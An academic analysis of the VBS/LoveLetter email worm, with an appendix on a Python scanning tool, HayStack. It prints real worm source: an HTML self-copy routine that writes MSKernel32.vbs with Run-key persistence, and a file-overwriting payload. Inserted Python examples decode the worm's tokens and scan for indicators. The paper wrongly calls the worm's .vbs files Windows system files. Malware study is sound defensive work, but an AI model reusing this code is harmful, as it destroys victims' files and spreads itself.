
8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack

http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 1/12

Hoggan 1/12

LoveLetter: A Targeted Analysis Using HeyStack

Written By: Rich Hoggan

Computer and Information Science, Notre Dame de Namur University

Abstract

Malware has become such a global threat to the internet community that malware analysis is imperative to understanding how to protect against it. This paper discusses the background of the VBS/LoveLetter virus and leads an analysis through its source code. Manual passive analysis is conducted against VBS/LoveLetter, in addition to running HayStack, a custom-built analysis tool.

Area of Focus: Information Technology employees, Cybersecurity employees, Computer Scientists, Cybersecurity enthusiasts, Reverse Engineers

Keywords: malware analysis, reverse engineering, cybersecurity, computer science

Introduction

From Brain to Flame, computer viruses have been a part of technology since the very beginning. Viruses have been written in many programming languages and have targeted all major operating systems, which now include mobile operating systems. Even with anti-virus protection, the chances of being infected and victimized by some type of malware continue to grow. Considering this staggering growth in malware, malware analysis is a necessary tactic for protecting against the various types of malware, which have gone from simply crashing a computer to stealing private information and even financial data.

In this paper we provide a brief background of the VBS/LoveLetter email worm; passive analysis of VBS/LoveLetter's source code occupies the rest of the paper. As such, we look at the key characteristics of the worm, analyse the programming language used to write it, isolate the worm's trigger and payload, and manually analyse the source code's functionality. In addition to manual passive analysis, HayStack, a custom-built analysis tool, is used to pull out information about the virus, including registry keys and URLs referenced in the source code.

A Brief Background of VBS/LoveLetter

VBS/LoveLetter was released into the wild in May of 2000, and the first networks to show a presence of the worm were in Asia and Europe. It wouldn't take long, however, for VBS/LoveLetter to reach the United States as well as any other country with a wired infrastructure connected to the internet. Most notably, the virus managed to infect computers associated with the Central Intelligence Agency and the Pentagon [1]. In addition to the quick propagation of the virus, variants began spreading just as quickly, most likely because the virus's source code was available after its initial release.

Since the virus spread through email, the trigger was an infected email carrying an attachment called "LOVE-LETTER-FOR-YOU.TXT.vbs", which users took for a love letter sent by someone in their Outlook address book. Once the user double-clicked the attachment, however, the virus executed, infecting the user's machine. This in turn activated the self-propagation of the virus: it sent itself to everyone in the user's Outlook address book and iterated through each of the user's directories in the file system searching for a number of different file types. Any file of these types found on the file system was overwritten with the virus's source code. At this point the user was infected with VBS/LoveLetter, and because the virus overwrote files on the user's file system, there was no way to recover the original files. To recover lost data, the user would need to have an uninfected external backup. Reflecting this outcome, some reports put data loss in the tens of thousands of dollars [2].

Passive Analysis

A Note on Laboratory Setup

Both manual and automated passive analysis was conducted on a Windows 8.1 machine running Python 2.7 and the HayStack malware analysis tool.

Dissecting Virus Components

Programming Language Used

VBS/LoveLetter was written in the Microsoft VBS scripting language. While declining in popularity in favour of languages such as Python, VBS has many facets that made it popular with IT staff and system administrators, as it could handle many types of automation tasks. VBS is an interpreted language: script files are interpreted line by line, as opposed to languages such as C, where source code must be passed through a compiler to create an executable file. Furthermore, VBS scripts execute as soon as they are double-clicked. This meant that when users opened the infected email attachment, or double-clicked any of the infected files in their file system, the virus would execute. This was possible because the Windows operating system did not display file extensions by default and also executed VBS files automatically. Even a more knowledgeable user had no way to realize they were executing a VBS file rather than opening a web page, short of having file extensions displayed.

Payload and Trigger

The virus's trigger was an infected email carrying the VBS script as an attachment. This method of propagation worked because the actual file type was hidden from the user, making the attachment look like a simple HTML file or web page. Thus, when the user opened the email attachment, the VBS file executed instead. The trigger can be seen in figure 1.

[Figure 1 - HTML trigger generation]

sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
' First half of the HTML template. The tokens #-# @-@ ?-? ^-^ stand in for
' ' " / \ so the template can sit inside VBScript string literals; dt1..dt6
' below swap them back before the file is written.
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? [email protected] ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
' Second half of the template: the VBScript that runs inside the generated
' HTML file. It decodes the embedded copy of this script (code2..code4),
' writes it to MSKernel32.vbs in the system folder and registers it under
' the Run key.
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
' Decode the placeholder tokens in both halves of the template.
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
' Read this script's own source and turn every line into a quoted VBScript
' literal, escaping ' " \ with the tokens [-[ ]-] %-% that code2..code4 undo.
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
' Write template head, embedded script lines and template tail to the HTM.
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
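The token substitutions figure 1 relies on, as an added example in Python (not code from the paper or from HayStack): the four HTML placeholders are decoded, and the self-copying loop together with its matching code2/code3/code4 decode are mirrored, so an analyst can read the generated HTM without running anything. The fragment of dta2 and the sample lines are constructed for this example.

```python
# Added example, not code from the paper or from HayStack: the placeholder
# substitutions used by LoveLetter's "sub html" (figure 1), reproduced in
# Python so an analyst can read the generated HTML and the re-embedded
# script without executing anything. All sample strings are constructed.

# Tokens the HTML template uses in place of characters that would break a
# VBScript string literal; dt1..dt6 in figure 1 undo them with replace().
HTML_TOKENS = [("#-#", "'"), ("@-@", '"'), ("?-?", "/"), ("^-^", "\\")]

# Tokens used when the script copies its own lines into the HTML file
# (the for-loop in figure 1); the VBScript inside the HTML reverses them
# (code2, code3, code4) before writing MSKernel32.vbs.
SELF_TOKENS = [("'", "[-["), ('"', "]-]"), ("\\", "%-%")]

CONTINUATION = '"&vbcrlf& _'   # suffix appended to all but the last line

def decode_html_template(template):
    """Reverse the #-# / @-@ / ?-? / ^-^ placeholders of dta1 and dta2."""
    for token, char in HTML_TOKENS:
        template = template.replace(token, char)
    return template

def escape_self_lines(lines):
    """Mirror the for-loop: escape quotes and backslashes, wrap each line in
    double quotes and append the continuation suffix to all but the last."""
    out = []
    last = len(lines) - 1
    for n, line in enumerate(lines):
        for char, token in SELF_TOKENS:
            line = line.replace(char, token)
        if n == last:
            out.append('"' + line + '"')
        else:
            out.append('"' + line + CONTINUATION)
    return out

def unescape_embedded(code):
    """Mirror code2/code3/code4 in the generated HTML: restore ' " and \\."""
    for char, token in SELF_TOKENS:
        code = code.replace(token, char)
    return code

# Constructed fragment in the style of dta2 (figure 1), not the full string.
RAW_DTA2_FRAGMENT = (
    "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows"
    "^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"
)

def decoded_registry_line():
    """The RegWrite line as it reads once the HTML file has been generated."""
    return decode_html_template(RAW_DTA2_FRAGMENT)

def self_copy_round_trip(lines):
    """Encode lines as the for-loop does, emulate the string concatenation
    the HTML-side VBScript performs, decode, and compare with the input."""
    literal_parts = []
    for encoded in escape_self_lines(lines):
        if encoded.endswith(CONTINUATION):
            literal_parts.append(encoded[1:-len(CONTINUATION)])
        else:
            literal_parts.append(encoded[1:-1])
    return unescape_embedded("\r\n".join(literal_parts)).split("\r\n") == lines
```

The registry key only appears in the raw script in its ^-^ form, which is why a scan that expects literal backslashes must decode the template first.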

Once the trigger was activated, the virus's payload was activated in turn. The payload iterated through the host file system, looking for numerous file types and overwriting them. Everything from media files (.jpg, .jpeg, .mp3, .mp2), system files (.bat, .com, .ini) and web files (.htm, .html) to source code files (.vbs, .cpp, .c, .h) was susceptible to the payload, the only caveat being that MP3 files were hidden rather than overwritten [4]. Part of this code can be seen in figure 2.

[Figure 2 - part of the code that searches for files to overwrite]

if (ext="vbs") or (ext="vbe") then
  ' script files are overwritten in place with the virus source (vbscopy)
  set ap=fso.OpenTextFile(f1.path,2,true)
  ap.write vbscopy
  ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
  ' overwritten, then copied as <basename>.vbs and the original deleted
  set ap=fso.OpenTextFile(f1.path,2,true)
  ap.write vbscopy
  ap.close
  bname=fso.GetBaseName(f1.path)
  set cop=fso.GetFile(f1.path)
  cop.copy(folderspec&"\"&bname&".vbs")
  fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
  ' overwritten, then copied as <name>.jpg.vbs and the original deleted
  set ap=fso.OpenTextFile(f1.path,2,true)
  ap.write vbscopy
  ap.close
  set cop=fso.GetFile(f1.path)
  cop.copy(f1.path&".vbs")
  fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
  ' a new <name>.mp3.vbs is created and the original is marked hidden (attribute 2)
  set mp3=fso.CreateTextFile(f1.path&".vbs")
  mp3.write vbscopy
  mp3.close
  set att=fso.GetFile(f1.path)
  att.attributes=att.attributes+2
end if

Found Registry Keys

Running the registry key scan in HayStack brings back the following output.

[Figure 2 - HayStack registry key scan results]

Looking at figure 2, the virus makes an attempt to download an executable file called "WIN-BUGSFIX.exe" into the Internet Explorer downloads directory. Without already knowing the history of the VBS/LoveLetter virus, one could only assume that WIN-BUGSFIX.exe is an executable of some sort; suspicion, however, would indicate that it is most likely an external threat, most likely a trojan horse. Finally, correlations can be made between code in the virus and the registry keys referencing MSKernel32.vbs and Win32DLL.vbs, which are both system files of the Windows operating system. In this case, however, the virus attempts to replace the actual system files with its own source code, because these files have ".vbs" file extensions.

Found URLs

Considering the suspicions formed from the previous scan, running the URL scan on the source code furthers our suspicions about the potential trojan horse, as there is now a URL associated with the same executable file, as shown in figure 3. In addition to the executable file, there is also a domain name which, when researched, indicates that the server hosting the domain name, skyinet.net, is located in Manila, Philippines. Researching this domain name also indicates that it is the domain name of an Internet Service Provider (ISP) in the Philippines. Once again, without already knowing the history of the virus, this information would seem to indicate a potential origin for the virus.

[Figure 3 - HayStack URL scan results]

Concluding Thoughts

While much of the information found about this virus has been known for quite some time, the exercise of analysing previously released malware helps in understanding how such viruses execute on the host file system, as well as what steps need to be taken to protect against data loss. Considering VBS/LoveLetter, one of the most important steps victims could and should have taken was maintaining backups of their data, as there was no way to recover infected data. Similarly, the virus's ability to execute its code automatically, without the user realizing that code was going to execute, was another serious implication of the virus. This is why current versions of Windows display a dialog box when code such as a VBS file is about to execute. As such, maintaining the most recent anti-virus definitions for a particular anti-virus product is extremely important, as is never trusting an email attachment unless it has been thoroughly scanned for viruses. Because malware is constantly growing in complexity, these tactics, amongst others, must become part of basic internet usage, as they are really one of the main lines of defense.


Works Cited

[1] Zetter, Kim. "When Love Came to Town: A Virus Investigation." PCWorld. N.p., 13 Nov. 2000. Web. 08 Oct. 2013.

[2] Crouch, Cameron. "Love Letter's Fallout Continues." PCWorld. N.p., 5 May 2000. Web. 08 Oct. 2013.


Appendix A - An Introduction to Using HayStack

Written By: Rich Hoggan

Notre Dame de Namur, Computer and Information Science

Introduction

HayStack was designed as a tool for analyzing malicious code. Instead of manually looking through a malicious specimen, one is able to use HayStack to scan for particular information more efficiently. HayStack was designed to conduct the following analysis:

String Scanning
Registry Key Scanning
Function Scanning
URL Scanning

When HayStack runs a particular scan against a malicious specimen, the software generates a report file which details the results that were found. Similarly, if the particular scan does not come back with positive results, a report file is still generated, allowing a forensic examiner to build a case for the type of malware being analyzed regardless of scan results.

Understanding HayStack’s Scanning Characteristics

String Scanning

String scanning is one of the simplest scans that HayStack runs against a malicious specimen: it simply looks for lines that include single and/or double quotes. If a line is found containing either of the two, it is stored and later sent to the command line as well as the report file. This can be seen in figure 1.

[Figure 1 - example of string scan]

Registry Key Scanning

Whereas string scanning simply searches for lines containing single and double quotes, registry key scanning goes a step further by looking for any of the common registry keys that might be referenced in the malicious code. If a registry key is found, it is stored and passed to the command line as well as its own report file. Figure 2 shows what this output might look like.

[Figure 2 - example of registry key scanning]

Function Scanning

Considering that malicious specimens can be written in a variety of languages, it is quite possible that functions, methods, or sub-routines will have been written to facilitate the functionality of the malicious specimen. It should be pointed out that the word function here does not refer to the functions built into the programming language, but to the functions written using the programming language, such as in the following listing.

[Listing 1 - example of a function, method, or sub-routine]

public void printHello() {
    System.out.println("Hello World!");
}

As such, HayStack scans for functions by looking for lines of code that contain the most typical function prototype declarations in the most popular programming languages, including VBScript, JavaScript, Java, and C/C++. Similar to the other types of scans produced by HayStack, this scan also generates its own report file. Lastly, the output of a function scan can be seen in figure 3.


[Figure 3 - example of function scan]

URL Scanning

The final scan conducted by HayStack is a URL scan. This scan looks for any type of URL, which can be an indicator of an attempted download of an external threat such as a trojan horse or a similar malicious specimen. These URLs are stored and passed to the command line and a custom report file when the scan completes. This can be seen in figure 4.

[Figure 4 - example of URL scan]
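HayStack's four scan types, as an added example (not HayStack's own code, which the paper does not reproduce): a minimal Python implementation of the string, registry key, function and URL scans run over a constructed VBScript sample. The registry paths, the URL and the routine names in the sample are placeholders written for this example, not values taken from the paper.

```python
import re

# Added example, not HayStack's own code: a minimal version of the four
# scans the appendix describes (string, registry key, function, URL), run
# over a constructed VBScript sample. The registry paths, the URL and the
# routine names in SAMPLE are placeholders written for this example.

SAMPLE = r'''
on error resume next
set regedit=CreateObject("WScript.Shell")
regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory",dirsystem
downread="http://example.invalid/placeholder-path/WIN-BUGSFIX.exe"
sub regruns
  ' comments also contain a single quote, so the string scan reports them
end sub
function folderlist(folderspec)
end function
'''.strip("\n")

# Registry hives (full and abbreviated) followed by backslash-separated path
# components; a closing quote or line end terminates the key.
REG_KEY_RE = re.compile(
    r'\b(?:HKEY_(?:LOCAL_MACHINE|CURRENT_USER|CLASSES_ROOT|USERS|CURRENT_CONFIG)'
    r'|HKLM|HKCU|HKCR|HKU|HKCC)(?:\\[^\\"\r\n]+)*')
URL_RE = re.compile(r'\b(?:https?|ftp)://[^\s"\'<>]+', re.IGNORECASE)
# Routine headers: VBScript sub/function, JavaScript function, and the
# common Java / C / C++ "type name(" shape.
FUNC_RE = re.compile(
    r'^[ \t]*(?:(?:private|public)[ \t]+)?(?:sub|function)[ \t]+\w+'
    r'|^[ \t]*(?:(?:public|private|protected|static)[ \t]+)*'
    r'(?:void|int|char|bool|String)[ \t]+\w+[ \t]*\(',
    re.IGNORECASE | re.MULTILINE)

def scan_strings(src):
    """Lines containing a single or double quote (HayStack's string scan).
    VBScript comments start with a quote, so they show up as false positives."""
    return [line for line in src.splitlines() if "'" in line or '"' in line]

def scan_registry_keys(src):
    return [m.group(0) for m in REG_KEY_RE.finditer(src)]

def scan_urls(src):
    return [m.group(0) for m in URL_RE.finditer(src)]

def scan_functions(src):
    return [m.group(0).strip() for m in FUNC_RE.finditer(src)]

def report(src):
    """Every scan type is present in the report even when it found nothing,
    so an empty result is still recorded, as the appendix describes."""
    return {
        "strings": scan_strings(src),
        "registry_keys": scan_registry_keys(src),
        "functions": scan_functions(src),
        "urls": scan_urls(src),
    }

if __name__ == "__main__":
    for scan, hits in report(SAMPLE).items():
        print(scan, len(hits), hits)
```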

Future Development

Considering that HayStack is still under development, there are many factors which need to be considered across all of the scan types. These factors include:

What gets stored
What gets printed to the screen and the various report files

These factors should be taken into account during initial use, as they might produce false positives and will change dramatically as development continues.

HayStack runs as a command line application written in Python. A web application version is also in development, which will allow users to create accounts and scan malicious code specimens using HayStack's tools without requiring the command line. Furthermore, additional functionality is being added to HayStack so that the tool will be able to examine executable files for URLs and similar attributes, including registry keys and operating system function calls. This will also be developed as a standalone scan type in the command line version of the tool.